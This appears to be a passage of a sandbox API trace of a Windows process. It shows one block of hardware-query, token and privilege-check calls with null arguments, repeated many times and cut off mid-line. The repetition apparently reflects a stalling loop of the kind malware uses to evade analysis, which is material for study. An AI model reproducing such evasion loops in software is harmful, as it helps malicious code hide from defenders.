0x0 [0017.062] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.062] GetLastError () returned 0x578 [0017.062] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.062] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.062] GetCurrentThread () returned 0xfffffffe [0017.062] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.062] GetLastError () returned 0x3f0 [0017.062] GetCurrentProcess () returned 0xffffffff [0017.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.062] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.062] SetLastError (dwErrCode=0x522) [0017.062] CloseHandle (hObject=0x114) returned 1 [0017.062] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.062] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.062] GetLastError () returned 0x578 [0017.062] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.062] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.062] GetCurrentThread () returned 0xfffffffe [0017.062] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.062] GetLastError () returned 0x3f0 [0017.062] GetCurrentProcess () returned 0xffffffff [0017.062] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.063] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.063] SetLastError (dwErrCode=0x522) [0017.063] CloseHandle (hObject=0x114) returned 1 [0017.063] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.063] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.063] GetLastError () returned 0x578 [0017.063] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.063] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.063] GetCurrentThread () returned 0xfffffffe [0017.063] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.063] GetLastError () returned 0x3f0 [0017.063] GetCurrentProcess () returned 0xffffffff [0017.063] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.063] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.063] SetLastError (dwErrCode=0x522) [0017.063] CloseHandle (hObject=0x114) returned 1 [0017.063] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.063] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.063] GetLastError () returned 0x578 [0017.063] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.063] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.063] GetCurrentThread () returned 0xfffffffe [0017.063] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.063] GetLastError () returned 0x3f0 [0017.063] GetCurrentProcess () returned 0xffffffff [0017.063] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.063] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.063] SetLastError (dwErrCode=0x522) [0017.063] CloseHandle (hObject=0x114) returned 1 [0017.063] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.063] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.063] GetLastError () returned 0x578 [0017.063] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.063] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.063] GetCurrentThread () returned 0xfffffffe [0017.063] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.063] GetLastError () returned 0x3f0 [0017.063] GetCurrentProcess () returned 0xffffffff [0017.063] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.063] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.063] SetLastError (dwErrCode=0x522) [0017.063] CloseHandle (hObject=0x114) returned 1 [0017.063] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.064] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.064] GetLastError () returned 0x578 [0017.064] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.064] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.064] GetCurrentThread () returned 0xfffffffe [0017.064] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.064] GetLastError () returned 0x3f0 [0017.064] GetCurrentProcess () returned 0xffffffff [0017.064] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.064] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.064] SetLastError (dwErrCode=0x522) [0017.064] CloseHandle (hObject=0x114) returned 1 [0017.064] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.064] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.064] GetLastError () returned 0x578 [0017.064] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.064] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.064] GetCurrentThread () returned 0xfffffffe [0017.064] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.064] GetLastError () returned 0x3f0 [0017.064] GetCurrentProcess () returned 0xffffffff [0017.064] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.064] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.064] SetLastError (dwErrCode=0x522) [0017.064] CloseHandle (hObject=0x114) returned 1 [0017.064] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.064] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.064] GetLastError () returned 0x578 [0017.064] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.064] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.064] GetCurrentThread () returned 0xfffffffe [0017.064] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.064] GetLastError () returned 0x3f0 [0017.064] GetCurrentProcess () returned 0xffffffff [0017.064] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.064] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.064] SetLastError (dwErrCode=0x522) [0017.064] CloseHandle (hObject=0x114) returned 1 [0017.064] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.064] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.064] GetLastError () returned 0x578 [0017.064] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.064] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.064] GetCurrentThread () returned 0xfffffffe [0017.065] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.065] GetLastError () returned 0x3f0 [0017.065] GetCurrentProcess () returned 0xffffffff [0017.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.065] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.065] SetLastError (dwErrCode=0x522) [0017.065] CloseHandle (hObject=0x114) returned 1 [0017.065] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.065] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.065] GetLastError () returned 0x578 [0017.065] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.065] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.065] GetCurrentThread () returned 0xfffffffe [0017.065] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.065] GetLastError () returned 0x3f0 [0017.065] GetCurrentProcess () returned 0xffffffff [0017.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.065] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.065] SetLastError (dwErrCode=0x522) [0017.065] CloseHandle (hObject=0x114) returned 1 [0017.065] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.065] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.065] GetLastError () returned 0x578 [0017.065] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.065] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.065] GetCurrentThread () returned 0xfffffffe [0017.065] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.065] GetLastError () returned 0x3f0 [0017.065] GetCurrentProcess () returned 0xffffffff [0017.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.065] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.065] SetLastError (dwErrCode=0x522) [0017.065] CloseHandle (hObject=0x114) returned 1 [0017.065] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.065] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.065] GetLastError () returned 0x578 [0017.065] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.065] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.065] GetCurrentThread () returned 0xfffffffe [0017.065] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.065] GetLastError () returned 0x3f0 [0017.065] GetCurrentProcess () returned 0xffffffff [0017.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.065] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.066] SetLastError (dwErrCode=0x522) [0017.066] CloseHandle (hObject=0x114) returned 1 [0017.066] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.066] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.066] GetLastError () returned 0x578 [0017.066] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.066] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.066] GetCurrentThread () returned 0xfffffffe [0017.066] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.066] GetLastError () returned 0x3f0 [0017.066] GetCurrentProcess () returned 0xffffffff [0017.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.066] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.066] SetLastError (dwErrCode=0x522) [0017.066] CloseHandle (hObject=0x114) returned 1 [0017.066] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.066] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.066] GetLastError () returned 0x578 [0017.066] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.066] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.066] GetCurrentThread () returned 0xfffffffe [0017.066] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.066] GetLastError () returned 0x3f0 [0017.066] GetCurrentProcess () returned 0xffffffff [0017.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.066] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.066] SetLastError (dwErrCode=0x522) [0017.066] CloseHandle (hObject=0x114) returned 1 [0017.066] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.066] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.066] GetLastError () returned 0x578 [0017.066] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.066] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.066] GetCurrentThread () returned 0xfffffffe [0017.066] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.066] GetLastError () returned 0x3f0 [0017.066] GetCurrentProcess () returned 0xffffffff [0017.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.066] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.066] SetLastError (dwErrCode=0x522) [0017.066] CloseHandle (hObject=0x114) returned 1 [0017.066] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.066] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.066] GetLastError () returned 0x578 [0017.066] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.067] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.067] GetCurrentThread () returned 0xfffffffe [0017.067] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.067] GetLastError () returned 0x3f0 [0017.067] GetCurrentProcess () returned 0xffffffff [0017.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.067] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.067] SetLastError (dwErrCode=0x522) [0017.067] CloseHandle (hObject=0x114) returned 1 [0017.067] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.067] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.067] GetLastError () returned 0x578 [0017.067] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.067] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.067] GetCurrentThread () returned 0xfffffffe [0017.067] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.067] GetLastError () returned 0x3f0 [0017.067] GetCurrentProcess () returned 0xffffffff [0017.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.067] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.067] SetLastError (dwErrCode=0x522) [0017.067] CloseHandle (hObject=0x114) returned 1 [0017.067] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.067] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.067] GetLastError () returned 0x578 [0017.067] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.067] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.067] GetCurrentThread () returned 0xfffffffe [0017.067] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.067] GetLastError () returned 0x3f0 [0017.067] GetCurrentProcess () returned 0xffffffff [0017.067] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.067] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.067] SetLastError (dwErrCode=0x522) [0017.067] CloseHandle (hObject=0x114) returned 1 [0017.067] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.067] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.067] GetLastError () returned 0x578 [0017.067] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.067] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.067] GetCurrentThread () returned 0xfffffffe [0017.067] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.067] GetLastError () returned 0x3f0 [0017.067] GetCurrentProcess () returned 0xffffffff [0017.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.068] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.068] SetLastError (dwErrCode=0x522) [0017.068] CloseHandle (hObject=0x114) returned 1 [0017.068] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.068] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.068] GetLastError () returned 0x578 [0017.068] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.068] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.068] GetCurrentThread () returned 0xfffffffe [0017.068] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.068] GetLastError () returned 0x3f0 [0017.068] GetCurrentProcess () returned 0xffffffff [0017.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.068] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.068] SetLastError (dwErrCode=0x522) [0017.068] CloseHandle (hObject=0x114) returned 1 [0017.068] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.068] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.068] GetLastError () returned 0x578 [0017.068] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.068] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.068] GetCurrentThread () returned 0xfffffffe [0017.068] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.068] GetLastError () returned 0x3f0 [0017.068] GetCurrentProcess () returned 0xffffffff [0017.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.068] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.068] SetLastError (dwErrCode=0x522) [0017.068] CloseHandle (hObject=0x114) returned 1 [0017.068] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.068] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.068] GetLastError () returned 0x578 [0017.068] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.068] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.068] GetCurrentThread () returned 0xfffffffe [0017.068] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.068] GetLastError () returned 0x3f0 [0017.068] GetCurrentProcess () returned 0xffffffff [0017.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.068] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.069] SetLastError (dwErrCode=0x522) [0017.069] CloseHandle (hObject=0x114) returned 1 [0017.069] SendMessageA (hWnd=0x0, 